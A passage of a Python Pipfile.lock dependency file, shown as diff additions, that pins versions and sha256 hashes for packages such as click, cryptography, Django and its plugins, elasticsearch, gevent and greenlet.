"sha256:1f30b48dd7fa1474554b0b0f3fdfdd4c13b5c737a3c6284d3cdc424ec0ffff3a", + "sha256:203f0c8871d5a7987be20c72442488a0b8cfd0f43b7973771640fc593f56321f", + "sha256:246de67b99b6851627d945db38147d1b209a899311b1305dd84916f2b88526c6", + "sha256:2dee8e57f052ef5353cf608e0b4c871aee320dd1b87d351c28764fc0ca55f9f4", + "sha256:2efb1bd13885392adfda4614c33d3b68dee4921fd0ac1d3988f8cbb7d589e72a", + "sha256:2f4ac36d8e2b4cc1aa71df3dd84ff8efbe3bfb97ac41242fbcfc053c67434f46", + "sha256:3170c9399da12c9dc66366e9d14da8bf7147e1e9d9ea566067bbce7bb74bd9c2", + "sha256:3b1613dd5aee995ec6d4c69f00378bbd07614702a315a2cf6c1d21461fe17c23", + "sha256:3bb3d25a8e6c0aedd251753a79ae98a093c7e7b471faa3aa9a93a81431987ace", + "sha256:3bb7fda7260735efe66d5107fb7e6af6a7c04c7fce9b2514e04b7a74b06bf5dd", + "sha256:41b25eaa7d15909cf3ac4c96088c1f266a9a93ec44f87f1d13d4a0e86c81b982", + "sha256:45de3f87179c1823e6d9e32156fb14c1927fcc9aba21433f088fdfb555b77c10", + "sha256:46fb8c61d794b78ec7134a715a3e564aafc8f6b5e338417cb19fe9f57a5a9bf2", + "sha256:48021783bdf96e3d6de03a6e39a1171ed5bd7e8bb93fc84cc649d11490f87cea", + "sha256:4957669ef390f0e6719db3613ab3a7631e68424604a7b448f079bee145da6e09", + "sha256:5e86d77b090dbddbe78867a0275cb4df08ea195e660f1f7f13435a4649e954e5", + "sha256:6339d047dab2780cc6220f46306628e04d9750f02f983ddb37439ca47ced7149", + "sha256:681eb3d7e02e3c3655d1b16059fbfb605ac464c834a0c629048a30fad2b27489", + "sha256:6c409c0deba34f147f77efaa67b8e4bb83d2f11c8806405f76397ae5b8c0d1c9", + "sha256:7095f6fbfaa55defb6b733cfeb14efaae7a29f0b59d8cf213be4e7ca0b857b80", + "sha256:70c610f6cbe4b9fce272c407dd9d07e33e6bf7b4aa1b7ffb6f6ded8e634e3592", + "sha256:72814c01533f51d68702802d74f77ea026b5ec52793c791e2da806a3844a46c3", + "sha256:7a4826ad2bd6b07ca615c74ab91f32f6c96d08f6fcc3902ceeedaec8cdc3bcd6", + "sha256:7c70087bfee18a42b4040bb9ec1ca15a08242cf5867c58726530bdf3945672ed", + "sha256:855eafa5d5a2034b4621c74925d89c5efef61418570e5ef9b37717d9c796419c", + "sha256:8700f06d0ce6f128de3ccdbc1acaea1ee264d2caa9ca05daaf492fde7c2a7200", + "sha256:89f1b185a01fe560bc8ae5f619e924407efca2191b56ce749ec84982fc59a32a", + "sha256:8b2c760cfc7042b27ebdb4a43a4453bd829a5742503599144d54a032c5dc7e9e", + "sha256:8c2f5e83493748286002f9369f3e6607c565a6a90425a3a1fef5ae32a36d749d", + "sha256:8e098148dd37b4ce3baca71fb394c81dc5d9c7728c95df695d2dca218edf40e6", + "sha256:94aea8eff76ee6d1cdacb07dd2123a68283cb5569e0250feab1240058f53b623", + "sha256:95eb302ff792e12aba9a8b8f8474ab229a83c103d74a750ec0bd1c1eea32e669", + "sha256:9bd9b3b31adcb054116447ea22caa61a285d92e94d710aa5ec97992ff5eb7cf3", + "sha256:9e608aafdb55eb9f255034709e20d5a83b6d60c054df0802fa9c9883d0a937aa", + "sha256:a103b3a7069b62f5d4890ae1b8f0597618f628b286b03d4bc9195230b154bfa9", + "sha256:a386ebe437176aab38c041de1260cd3ea459c6ce5263594399880bbc398225b2", + "sha256:a38856a971c602f98472050165cea2cdc97709240373041b69030be15047691f", + "sha256:a401b4598e5d3f4a9a811f3daf42ee2291790c7f9d74b18d75d6e21dda98a1a1", + "sha256:a7647ebdfb9682b7bb97e2a5e7cb6ae735b1c25008a70b906aecca294ee96cf4", + "sha256:aaf63899c94de41fe3cf934601b0f7ccb6b428c6e4eeb80da72c58eab077b19a", + "sha256:b0dac0ff919ba34d4df1b6131f59ce95b08b9065233446be7e459f95554c0dc8", + "sha256:baacc6aee0b2ef6f3d308e197b5d7a81c0e70b06beae1f1fcacffdbd124fe0e3", + "sha256:bf420121d4c8dce6b889f0e8e4ec0ca34b7f40186203f06a946fa0276ba54029", + "sha256:c04a46716adde8d927adb9457bbe39cf473e1e2c2f5d0a16ceb837e5d841ad4f", + "sha256:c0b21078a4b56965e2b12f247467b234734491897e99c1d51cee628da9786959", + "sha256:c1c76a1743432b4b60ab3358c937a3fe1341c828ae6194108a94c69028247f22", + "sha256:c4983bf937209c57240cff65906b18bb35e64ae872da6a0db937d7b4af845dd7", + "sha256:c4fb39a81950ec280984b3a44f5bd12819953dc5fa3a7e6fa7a80db5ee853952", + "sha256:c57921cda3a80d0f2b8aec7e25c8aa14479ea92b5b51b6876d975d925a2ea346", + "sha256:c8063cf17b19661471ecbdb3df1c84f24ad2e389e326ccaf89e3fb2484d8dd7e", + "sha256:ccd16eb18a849fd8dcb23e23380e2f0a354e8daa0c984b8a732d9cfaba3a776d", + "sha256:cd6dbe0238f7743d0efe563ab46294f54f9bc8f4b9bcf57c3c666cc5bc9d1299", + "sha256:d62e51710986674142526ab9f78663ca2b0726066ae26b78b22e0f5e571238dd", + "sha256:db901e2ac34c931d73054d9797383d0f8009991e723dab15109740a63e7f902a", + "sha256:e03b8895a6990c9ab2cdcd0f2fe44088ca1c65ae592b8f795c3294af00a461c3", + "sha256:e1c8a2f4c69e08e89632defbfabec2feb8a8d99edc9f89ce33c4b9e36ab63037", + "sha256:e4b749b9cc6ee664a3300bb3a273c1ca8068c46be705b6c31cf5d276f8628a94", + "sha256:e6a5bf2cba5ae1bb80b154ed68a3cfa2fa00fde979a7f50d6598d3e17d9ac20c", + "sha256:e857a2232ba53ae940d3456f7533ce6ca98b81917d47adc3c7fd55dad8fab858", + "sha256:ee4006268ed33370957f55bf2e6f4d263eaf4dc3cfc473d1d90baff6ed36ce4a", + "sha256:eef9df1eefada2c09a5e7a40991b9fc6ac6ef20b1372abd48d2794a316dc0449", + "sha256:f058f6963fd82eb143c692cecdc89e075fa0828db2e5b291070485390b2f1c9c", + "sha256:f25c229a6ba38a35ae6e25ca1264621cc25d4d38dca2942a7fce0b67a4efe918", + "sha256:f2a1d0fd4242bd8643ce6f98927cf9c04540af6efa92323e9d3124f57727bfc1", + "sha256:f7560358a6811e52e9c4d142d497f1a6e10103d3a6881f18d04dbce3729c0e2c", + "sha256:f779d3ad205f108d14e99bb3859aa7dd8e9c68874617c72354d7ecaec2a054ac", + "sha256:f87f746ee241d30d6ed93969de31e5ffd09a2961a051e60ae6bddde9ec3583aa" + ], + "markers": "python_full_version >= '3.7.0'", + "version": "==3.2.0" + }, + "click": { + "hashes": [ + "sha256:ae74fb96c20a0277a1d615f1e4d73c8414f5a98db8b799a7931d1582f3390c28", + "sha256:ca9853ad459e787e2192211578cc907e7594e294c7ccc834310722b41b9ca6de" + ], + "markers": "python_version >= '3.7'", + "version": "==8.1.7" + }, + "click-didyoumean": { + "hashes": [ + "sha256:a0713dc7a1de3f06bc0df5a9567ad19ead2d3d5689b434768a6145bff77c0667", + "sha256:f184f0d851d96b6d29297354ed981b7dd71df7ff500d82fa6d11f0856bee8035" + ], + "markers": "python_full_version >= '3.6.2' and python_full_version < '4.0.0'", + "version": "==0.3.0" + }, + "click-plugins": { + "hashes": [ + "sha256:46ab999744a9d831159c3411bb0c79346d94a444df9a3a3742e9ed63645f264b", + "sha256:5d262006d3222f5057fd81e1623d4443e41dcda5dc815c06b442aa3c02889fc8" + ], + "version": "==1.1.1" + }, + "click-repl": { + "hashes": [ + "sha256:17849c23dba3d667247dc4defe1757fff98694e90fe37474f3feebb69ced26a9", + "sha256:fb7e06deb8da8de86180a33a9da97ac316751c094c6899382da7feeeeb51b812" + ], + "markers": "python_version >= '3.6'", + "version": "==0.3.0" + }, + "crcmod": { + "hashes": [ + "sha256:50586ab48981f11e5b117523d97bb70864a2a1af246cf6e4f5c4a21ef4611cd1", + "sha256:69a2e5c6c36d0f096a7beb4cd34e5f882ec5fd232efb710cdb85d4ff196bd52e", + "sha256:737fb308fa2ce9aed2e29075f0d5980d4a89bfbec48a368c607c5c63b3efb90e", + "sha256:dc7051a0db5f2bd48665a990d3ec1cc305a466a77358ca4492826f41f283601e" + ], + "version": "==1.7" + }, + "cryptography": { + "hashes": [ + "sha256:0d09fb5356f975974dbcb595ad2d178305e5050656affb7890a1583f5e02a306", + "sha256:23c2d778cf829f7d0ae180600b17e9fceea3c2ef8b31a99e3c694cbbf3a24b84", + "sha256:3fb248989b6363906827284cd20cca63bb1a757e0a2864d4c1682a985e3dca47", + "sha256:41d7aa7cdfded09b3d73a47f429c298e80796c8e825ddfadc84c8a7f12df212d", + "sha256:42cb413e01a5d36da9929baa9d70ca90d90b969269e5a12d39c1e0d475010116", + "sha256:4c2f0d35703d61002a2bbdcf15548ebb701cfdd83cdc12471d2bae80878a4207", + "sha256:4fd871184321100fb400d759ad0cddddf284c4b696568204d281c902fc7b0d81", + "sha256:5259cb659aa43005eb55a0e4ff2c825ca111a0da1814202c64d28a985d33b087", + "sha256:57a51b89f954f216a81c9d057bf1a24e2f36e764a1ca9a501a6964eb4a6800dd", + "sha256:652627a055cb52a84f8c448185922241dd5217443ca194d5739b44612c5e6507", + "sha256:67e120e9a577c64fe1f611e53b30b3e69744e5910ff3b6e97e935aeb96005858", + "sha256:6af1c6387c531cd364b72c28daa29232162010d952ceb7e5ca8e2827526aceae", + "sha256:6d192741113ef5e30d89dcb5b956ef4e1578f304708701b8b73d38e3e1461f34", + "sha256:7efe8041897fe7a50863e51b77789b657a133c75c3b094e51b5e4b5cec7bf906", + "sha256:84537453d57f55a50a5b6835622ee405816999a7113267739a1b4581f83535bd", + "sha256:8f09daa483aedea50d249ef98ed500569841d6498aa9c9f4b0531b9964658922", + "sha256:95dd7f261bb76948b52a5330ba5202b91a26fbac13ad0e9fc8a3ac04752058c7", + "sha256:a74fbcdb2a0d46fe00504f571a2a540532f4c188e6ccf26f1f178480117b33c4", + "sha256:a983e441a00a9d57a4d7c91b3116a37ae602907a7618b882c8013b5762e80574", + "sha256:ab8de0d091acbf778f74286f4989cf3d1528336af1b59f3e5d2ebca8b5fe49e1", + "sha256:aeb57c421b34af8f9fe830e1955bf493a86a7996cc1338fe41b30047d16e962c", + "sha256:ce785cf81a7bdade534297ef9e490ddff800d956625020ab2ec2780a556c313e", + "sha256:d0d651aa754ef58d75cec6edfbd21259d93810b73f6ec246436a21b7841908de" + ], + "index": "pypi", + "version": "==41.0.3" + }, + "dataclasses-json": { + "hashes": [ + "sha256:5ec6fed642adb1dbdb4182badb01e0861badfd8fda82e3b67f44b2d1e9d10d21", + "sha256:d82896a94c992ffaf689cd1fafc180164e2abdd415b8f94a7f78586af5886236" + ], + "index": "pypi", + "version": "==0.5.14" + }, + "ddt": { + "hashes": [ + "sha256:e3c93b961a108b4f4d5a6c7f2263513d928baf3bb5b32af8e1c804bfb041141d", + "sha256:f71b348731b8c78c3100bffbd951a769fbd439088d1fdbb3841eee019af80acd" + ], + "index": "pypi", + "version": "==1.6.0" + }, + "defusedxml": { + "hashes": [ + "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69", + "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61" + ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", + "version": "==0.7.1" + }, + "diff-match-patch": { + "hashes": [ + "sha256:953019cdb9c9d2c9e47b5b12bcff3cf4746fc4598eb406076fa1fc27e6a1f15c", + "sha256:dce43505fb7b1b317de7195579388df0746d90db07015ed47a85e5e44930ef93" + ], + "markers": "python_version >= '3.7'", + "version": "==20230430" + }, + "django": { + "hashes": [ + "sha256:a477ab326ae7d8807dc25c186b951ab8c7648a3a23f9497763c37307a2b5ef87", + "sha256:dec2a116787b8e14962014bf78e120bba454135108e1af9e9b91ade7b2964c40" + ], + "index": "pypi", + "version": "==3.2.20" + }, + "django-add-default-value": { + "hashes": [ + "sha256:514b357f4a5e5c5dd9f02ca42d19d51688ed4a9cac62a7e35d09025f632bba93", + "sha256:a539767f498ab2e3022f98f743aa4473354a24df037859543cd2545f650cadcc" + ], + "index": "pypi", + "version": "==0.10.0" + }, + "django-celery-beat": { + "hashes": [ + "sha256:b8a13afb15e7c53fc04f4f847ac71a6d32088959aba701eb7c4a59f0c28ba543", + "sha256:c4c72a9579f20eff4c4ccf1b58ebdca5ef940f4210065057db1754ea5f8dffdc" + ], + "index": "pypi", + "version": "==2.2.0" + }, + "django-cors-headers": { + "hashes": [ + "sha256:9ada212b0e2efd4a5e339360ffc869cb21ac5605e810afe69f7308e577ea5bde", + "sha256:f9749c6410fe738278bc2b6ef17f05195bc7b251693c035752d8257026af024f" + ], + "index": "pypi", + "version": "==4.2.0" + }, + "django-cprofile-middleware": { + "hashes": [ + "sha256:b942185a38f3b582935a55c768f126ce9a6f0cefceee3b5d19e6b307ad129889" + ], + "index": "pypi", + "version": "==1.0.5" + }, + "django-elasticsearch-dsl": { + "hashes": [ + "sha256:3c58a254a6318b169eb904d41d802924b99ea8e53ddc2c596ebba90506cf47fa", + "sha256:811d3909b3387fd55c19d9bbcf0e9a9b234f085df3f8422d59e7519a5f733e0e" + ], + "index": "pypi", + "version": "==7.2.2" + }, + "django-filter": { + "hashes": [ + "sha256:2fe15f78108475eda525692813205fa6f9e8c1caf1ae65daa5862d403c6dbf00", + "sha256:d12d8e0fc6d3eb26641e553e5d53b191eb8cec611427d4bdce0becb1f7c172b5" + ], + "index": "pypi", + "version": "==23.2" + }, + "django-health-check": { + "hashes": [ + "sha256:20dc5ccb516a4e7163593fd4026f0a7531e3027b47d23ebe3bd9dbc99ac4354c", + "sha256:d1b8671e79d1de6e3dd1a9c69566222b0bfcfacca8b90511a4407b2d0d3d2778" + ], + "index": "pypi", + "version": "==3.17.0" + }, + "django-import-export": { + "hashes": [ + "sha256:c39c003bfc803fb63ba7742562f1667603a4a8d7426261845d75ce8582d40f48", + "sha256:cf6f3dabdd4f32dcb26e25c7ddcba7aee3168b55d380b0da79f0349afa17c011" + ], + "index": "pypi", + "version": "==2.5.0" + }, + "django-mock-queries": { + "hashes": [ + "sha256:7ee3f34752e8131479924ea6952fe37c4106cc18e6fc3e5e9b28b333eeda10b3" + ], + "index": "pypi", + "version": "==v2.1.7" + }, + "django-modeltranslation": { + "hashes": [ + "sha256:e247840b9038b7e7b2dc6f1b4868dfe88737540883eaed3d4b4775e5bd89c7fd" + ], + "index": "pypi", + "version": "==0.17.7" + }, + "django-prometheus": { + "hashes": [ + "sha256:cf9b26f7ba2e4568f08f8f91480a2882023f5908579681bcf06a4d2465f12168", + "sha256:f9c8b6c780c9419ea01043c63a437d79db2c33353451347894408184ad9c3e1e" + ], + "index": "pypi", + "version": "==2.3.1" + }, + "django-ranged-response": { + "hashes": [ + "sha256:f71fff352a37316b9bead717fc76e4ddd6c9b99c4680cdf4783b9755af1cf985" + ], + "index": "pypi", + "version": "==0.2.0" + }, + "django-redis": { + "hashes": [ + "sha256:1d037dc02b11ad7aa11f655d26dac3fb1af32630f61ef4428860a2e29ff92026", + "sha256:8a99e5582c79f894168f5865c52bd921213253b7fd64d16733ae4591564465de" + ], + "index": "pypi", + "version": "==5.2.0" + }, + "django-rest-framework-proxy": { + "hashes": [ + "sha256:f5154c525c851f98680a960f43526de98af545e1cb9b4cfaa08a230fb7f1e58d" + ], + "index": "pypi", + "version": "==1.6.0" + }, + "django-seriously": { + "hashes": [ + "sha256:591a2be6e18c229117e0196d9c8e6bd600f5c52f9eebe868e709c71acb53ef58", + "sha256:771f88a24f6166bdb3a944769fa09e24c317ea1b8f5ee8040d121d30b4395219" + ], + "index": "pypi", + "version": "==0.4.3" + }, + "django-silk": { + "hashes": [ + "sha256:2f1fcaaf21192011147537fe1ca72dc9f552f32d7043ebd82aeeda370f194469", + "sha256:50552f06d9306d06517fbeab9a2c74856355e06304f03ed16b6dd353f7c77e7a" + ], + "index": "pypi", + "version": "==5.0.3" + }, + "django-simple-captcha": { + "hashes": [ + "sha256:567ad84fa64c86508c679b8425cc1410c44b3cd6467e54f8d31cf077d9366407", + "sha256:6e1fcc4f4005f7d69ee7a2e59a7e863b5d3918f36a85a4d811498984aecc48ce" + ], + "index": "pypi", + "version": "==0.5.18" + }, + "django-stubs": { + "extras": [ + "compatible-mypy" + ], + "hashes": [ + "sha256:0bbf9eb172c5b06eccff2d704c7c3906e4a2c6146df8c32ee9f3a51e29265581", + "sha256:25010658acac0ce4a69211b55dd719fd16dbfe54fcfe5c878d0c8db07bdd5482" + ], + "index": "pypi", + "version": "==1.15.0" + }, + "django-stubs-ext": { + "hashes": [ + "sha256:c69d1cc46f1c4c3b7894b685a5022c29b2a36c7cfb52e23762eaf357ebfc2c98", + "sha256:fdacc65a14d2d4b97334b58ff178a5853ec8c8c76cec406e417916ad67536ce4" + ], + "markers": "python_version >= '3.8'", + "version": "==4.2.2" + }, + "django-timezone-field": { + "hashes": [ + "sha256:5dd5bd9249382bef8847d3e7e4c32b7be182a4b538f354130d1252ed228892f8", + "sha256:7552d2b0f145684b7de3fb5046101c7efd600cc6ba951b15c630fa1e1b83558e" + ], + "markers": "python_version >= '3.5'", + "version": "==4.2.3" + }, + "django-utils": { + "hashes": [ + "sha256:98b59b368d499b4d1b6dc66f15c0a136833bea12e0b299efdbfd754dc04c79d5" + ], + "index": "pypi", + "version": "==0.0.2" + }, + "django-utils-six": { + "hashes": [ + "sha256:4ef9d20de679a5b2448429476452493661fe08f23d6e788a8e9816ec05e3c5b0", + "sha256:8f0e77289d911069a6a15bab5a25ccf2c0fcb8fc4177461dd17470cfdeb94aa6" + ], + "index": "pypi", + "version": "==2.0" + }, + "django-xff": { + "hashes": [ + "sha256:8935dce34383d65b545564a3cc17dc8010c8cdec231b0932e6073ddc766d679d", + "sha256:d2a34e947e730d0c899b6386b28cf675edafa9d64336cdb8c9656b0a58ed80b6", + "sha256:fc87333f64d2ff2ce4ab6449e814240f9f195c290d2c8789ca81a1c98f5522ec" + ], + "index": "pypi", + "version": "==1.4.0" + }, + "djangorestframework": { + "hashes": [ + "sha256:6d1d59f623a5ad0509fe0d6bfe93cbdfe17b8116ebc8eda86d45f6e16e819aaf", + "sha256:f747949a8ddac876e879190df194b925c177cdeb725a099db1460872f7c0a7f2" + ], + "index": "pypi", + "version": "==3.12.4" + }, + "djangorestframework-dataclasses": { + "hashes": [ + "sha256:802300f812a96715079209f8dabecbab0b9716ae34a770db61f51a6897916abf", + "sha256:b061ef12f23394e91107f9b915dec38fb0a69d97a0ac9e62207aa90908375211" + ], + "index": "pypi", + "version": "==1.3.0" + }, + "djangorestframework-stubs": { + "extras": [ + "compatible-mypy" + ], + "hashes": [ + "sha256:89f6c2add193cb5ab61b9e47187b33a93cc099376a8df5e4d6c3fc8ecb992d3b", + "sha256:9475e1374b057ffbdcaaa84a060fe5f01476d8b9014d82a83b4153f57fbcbc1f" + ], + "index": "pypi", + "version": "==1.9.1" + }, + "docxcompose": { + "hashes": [ + "sha256:b1a40d4f95751565822350174971012875f82a32b83a9d1be098edd965047029" + ], + "index": "pypi", + "version": "==1.3.4" + }, + "docxtpl": { + "hashes": [ + "sha256:6ce60f38ce01d1698932bfba5c8b02e14c2cbdfb13c1c1fa15c30c433d88982d", + "sha256:a18e33e2e25a4c63d49cd76a3f1e495e53eb96062ecbc7715a8d8f4540c3195b" + ], + "index": "pypi", + "version": "==0.16.0" + }, + "drf-spectacular": { + "hashes": [ + "sha256:17ac5e31e5d6150dd5fa10843b429202f4f38069202acc44394cc5a771de63d9", + "sha256:866e16ddaae167a1234c76cd8c351161373551db994ce9665b347b32d5daf38b" + ], + "index": "pypi", + "version": "==0.22.1" + }, + "elasticsearch": { + "hashes": [ + "sha256:555170b4e13a823f4472bc12a148aef90febd5b90b16be83651d35524f34acb3", + "sha256:ed9c0cd58e05959a56e306ecf444f794da6afde75b213e26758f7a317e5e668c" + ], + "index": "pypi", + "version": "==7.17.7" + }, + "elasticsearch-dsl": { + "hashes": [ + "sha256:07ee9c87dc28cc3cae2daa19401e1e18a172174ad9e5ca67938f752e3902a1d5", + "sha256:97f79239a252be7c4cce554c29e64695d7ef6a4828372316a5e5ff815e7a7498" + ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==7.4.1" + }, + "et-xmlfile": { + "hashes": [ + "sha256:8eb9e2bc2f8c97e37a2dc85a09ecdcdec9d8a396530a6d5a33b30b9a92da0c5c", + "sha256:a2ba85d1d6a74ef63837eed693bcb89c3f752169b0e3e7ae5b16ca5e1b3deada" + ], + "markers": "python_version >= '3.6'", + "version": "==1.1.0" + }, + "flower": { + "hashes": [ + "sha256:5ab717b979530770c16afb48b50d2a98d23c3e9fe39851dcf6bc4d01845a02a0", + "sha256:9db2c621eeefbc844c8dd88be64aef61e84e2deb29b271e02ab2b5b9f01068e2" + ], + "index": "pypi", + "version": "==2.0.1" + }, + "gevent": { + "hashes": [ + "sha256:018f93de7d5318d2fb440f846839a4464738468c3476d5c9cf7da45bb71c18bd", + "sha256:0d581f22a5be6281b11ad6309b38b18f0638cf896931223cbaa5adb904826ef6", + "sha256:1472012493ca1fac103f700d309cb6ef7964dcdb9c788d1768266e77712f5e49", + "sha256:172caa66273315f283e90a315921902cb6549762bdcb0587fd60cb712a9d6263", + "sha256:17b68f4c9e20e47ad49fe797f37f91d5bbeace8765ce2707f979a8d4ec197e4d", + "sha256:1ca01da176ee37b3527a2702f7d40dbc9ffb8cfc7be5a03bfa4f9eec45e55c46", + "sha256:1d543c9407a1e4bca11a8932916988cfb16de00366de5bf7bc9e7a3f61e60b18", + "sha256:1e1286a76f15b5e15f1e898731d50529e249529095a032453f2c101af3fde71c", + "sha256:1e955238f59b2947631c9782a713280dd75884e40e455313b5b6bbc20b92ff73", + "sha256:1f001cac0ba8da76abfeb392a3057f81fab3d67cc916c7df8ea977a44a2cc989", + "sha256:1ff3796692dff50fec2f381b9152438b221335f557c4f9b811f7ded51b7a25a1", + "sha256:2929377c8ebfb6f4d868d161cd8de2ea6b9f6c7a5fcd4f78bcd537319c16190b", + "sha256:319d8b1699b7b8134de66d656cd739b308ab9c45ace14d60ae44de7775b456c9", + "sha256:323b207b281ba0405fea042067fa1a61662e5ac0d574ede4ebbda03efd20c350", + "sha256:3b7eae8a0653ba95a224faaddf629a913ace408edb67384d3117acf42d7dcf89", + "sha256:4114f0f439f0b547bb6f1d474fee99ddb46736944ad2207cef3771828f6aa358", + "sha256:4197d423e198265eef39a0dea286ef389da9148e070310f34455ecee8172c391", + "sha256:494c7f29e94df9a1c3157d67bb7edfa32a46eed786e04d9ee68d39f375e30001", + "sha256:4e2f008c82dc54ec94f4de12ca6feea60e419babb48ec145456907ae61625aa4", + "sha256:53ee7f170ed42c7561fe8aff5d381dc9a4124694e70580d0c02fba6aafc0ea37", + "sha256:54f4bfd74c178351a4a05c5c7df6f8a0a279ff6f392b57608ce0e83c768207f9", + "sha256:58898dbabb5b11e4d0192aae165ad286dc6742c543e1be9d30dc82753547c508", + "sha256:59b47e81b399d49a5622f0f503c59f1ce57b7705306ea0196818951dfc2f36c8", + "sha256:5aa99e4882a9e909b4756ee799c6fa0f79eb0542779fad4cc60efa23ec1b2aa8", + "sha256:6c04ee32c11e9fcee47c1b431834878dc987a7a2cc4fe126ddcae3bad723ce89", + "sha256:84c517e33ed604fa06b7d756dc0171169cc12f7fdd68eb7b17708a62eebf4516", + "sha256:8729129edef2637a8084258cb9ec4e4d5ca45d97ac77aa7a6ff19ccb530ab731", + "sha256:877abdb3a669576b1d51ce6a49b7260b2a96f6b2424eb93287e779a3219d20ba", + "sha256:8c192d2073e558e241f0b592c1e2b34127a4481a5be240cad4796533b88b1a98", + "sha256:8f2477e7b0a903a01485c55bacf2089110e5f767014967ba4b287ff390ae2638", + "sha256:96c56c280e3c43cfd075efd10b250350ed5ffd3c1514ec99a080b1b92d7c8374", + "sha256:97cd42382421779f5d82ec5007199e8a84aa288114975429e4fd0a98f2290f10", + "sha256:98bc510e80f45486ef5b806a1c305e0e89f0430688c14984b0dbdec03331f48b", + "sha256:990d7069f14dc40674e0d5cb43c68fd3bad8337048613b9bb94a0c4180ffc176", + "sha256:9d85574eb729f981fea9a78998725a06292d90a3ed50ddca74530c3148c0be41", + "sha256:a2237451c721a0f874ef89dbb4af4fdc172b76a964befaa69deb15b8fff10f49", + "sha256:a47a4e77e2bc668856aad92a0b8de7ee10768258d93cd03968e6c7ba2e832f76", + "sha256:a5488eba6a568b4d23c072113da4fc0feb1b5f5ede7381656dc913e0d82204e2", + "sha256:ae90226074a6089371a95f20288431cd4b3f6b0b096856afd862e4ac9510cddd", + "sha256:b43d500d7d3c0e03070dee813335bb5315215aa1cf6a04c61093dfdd718640b3", + "sha256:b6c144e08dfad4106effc043a026e5d0c0eff6ad031904c70bf5090c63f3a6a7", + "sha256:d21ad79cca234cdbfa249e727500b0ddcbc7adfff6614a96e6eaa49faca3e4f2", + "sha256:d82081656a5b9a94d37c718c8646c757e1617e389cdc533ea5e6a6f0b8b78545", + "sha256:da4183f0b9d9a1e25e1758099220d32c51cc2c6340ee0dea3fd236b2b37598e4", + "sha256:db562a8519838bddad0c439a2b12246bab539dd50e299ea7ff3644274a33b6a5", + "sha256:ddaa3e310a8f1a45b5c42cf50b54c31003a3028e7d4e085059090ea0e7a5fddd", + "sha256:ed7f16613eebf892a6a744d7a4a8f345bc6f066a0ff3b413e2479f9c0a180193", + "sha256:efc003b6c1481165af61f0aeac248e0a9ac8d880bb3acbe469b448674b2d5281", + "sha256:f01c9adbcb605364694b11dcd0542ec468a29ac7aba2fb5665dc6caf17ba4d7e", + "sha256:f23d0997149a816a2a9045af29c66f67f405a221745b34cefeac5769ed451db8", + "sha256:f3329bedbba4d3146ae58c667e0f9ac1e6f1e1e6340c7593976cdc60aa7d1a47", + "sha256:f7ed2346eb9dc4344f9cb0d7963ce5b74fe16fdd031a2809bb6c2b6eba7ebcd5" + ], + "index": "pypi", + "version": "==22.10.2" + }, + "gprof2dot": { + "hashes": [ + "sha256:45b4d298bd36608fccf9511c3fd88a773f7a1abc04d6cd39445b11ba43133ec5", + "sha256:f165b3851d3c52ee4915eb1bd6cca571e5759823c2cd0f71a79bda93c2dc85d6" + ], + "markers": "python_version >= '2.7'", + "version": "==2022.7.29" + }, + "greenlet": { + "hashes": [ + "sha256:03a8f4f3430c3b3ff8d10a2a86028c660355ab637cee9333d63d66b56f09d52a", + "sha256:0bf60faf0bc2468089bdc5edd10555bab6e85152191df713e2ab1fcc86382b5a", + "sha256:18a7f18b82b52ee85322d7a7874e676f34ab319b9f8cce5de06067384aa8ff43", + "sha256:18e98fb3de7dba1c0a852731c3070cf022d14f0d68b4c87a19cc1016f3bb8b33", + "sha256:1a819eef4b0e0b96bb0d98d797bef17dc1b4a10e8d7446be32d1da33e095dbb8", + "sha256:26fbfce90728d82bc9e6c38ea4d038cba20b7faf8a0ca53a9c07b67318d46088", + "sha256:2780572ec463d44c1d3ae850239508dbeb9fed38e294c68d19a24d925d9223ca", + "sha256:283737e0da3f08bd637b5ad058507e578dd462db259f7f6e4c5c365ba4ee9343", + "sha256:2d4686f195e32d36b4d7cf2d166857dbd0ee9f3d20ae349b6bf8afc8485b3645", + "sha256:2dd11f291565a81d71dab10b7033395b7a3a5456e637cf997a6f33ebdf06f8db", + "sha256:30bcf80dda7f15ac77ba5af2b961bdd9dbc77fd4ac6105cee85b0d0a5fcf74df", + "sha256:32e5b64b148966d9cccc2c8d35a671409e45f195864560829f395a54226408d3", + "sha256:36abbf031e1c0f79dd5d596bfaf8e921c41df2bdf54ee1eed921ce1f52999a86", + "sha256:3a06ad5312349fec0ab944664b01d26f8d1f05009566339ac6f63f56589bc1a2", + "sha256:3a51c9751078733d88e013587b108f1b7a1fb106d402fb390740f002b6f6551a", + "sha256:3c9b12575734155d0c09d6c3e10dbd81665d5c18e1a7c6597df72fd05990c8cf", + "sha256:3f6ea9bd35eb450837a3d80e77b517ea5bc56b4647f5502cd28de13675ee12f7", + "sha256:4b58adb399c4d61d912c4c331984d60eb66565175cdf4a34792cd9600f21b394", + "sha256:4d2e11331fc0c02b6e84b0d28ece3a36e0548ee1a1ce9ddde03752d9b79bba40", + "sha256:5454276c07d27a740c5892f4907c86327b632127dd9abec42ee62e12427ff7e3", + "sha256:561091a7be172ab497a3527602d467e2b3fbe75f9e783d8b8ce403fa414f71a6", + "sha256:6c3acb79b0bfd4fe733dff8bc62695283b57949ebcca05ae5c129eb606ff2d74", + "sha256:703f18f3fda276b9a916f0934d2fb6d989bf0b4fb5a64825260eb9bfd52d78f0", + "sha256:7492e2b7bd7c9b9916388d9df23fa49d9b88ac0640db0a5b4ecc2b653bf451e3", + "sha256:76ae285c8104046b3a7f06b42f29c7b73f77683df18c49ab5af7983994c2dd91", + "sha256:7cafd1208fdbe93b67c7086876f061f660cfddc44f404279c1585bbf3cdc64c5", + "sha256:7efde645ca1cc441d6dc4b48c0f7101e8d86b54c8530141b09fd31cef5149ec9", + "sha256:88d9ab96491d38a5ab7c56dd7a3cc37d83336ecc564e4e8816dbed12e5aaefc8", + "sha256:8eab883b3b2a38cc1e050819ef06a7e6344d4a990d24d45bc6f2cf959045a45b", + "sha256:910841381caba4f744a44bf81bfd573c94e10b3045ee00de0cbf436fe50673a6", + "sha256:9190f09060ea4debddd24665d6804b995a9c122ef5917ab26e1566dcc712ceeb", + "sha256:937e9020b514ceedb9c830c55d5c9872abc90f4b5862f89c0887033ae33c6f73", + 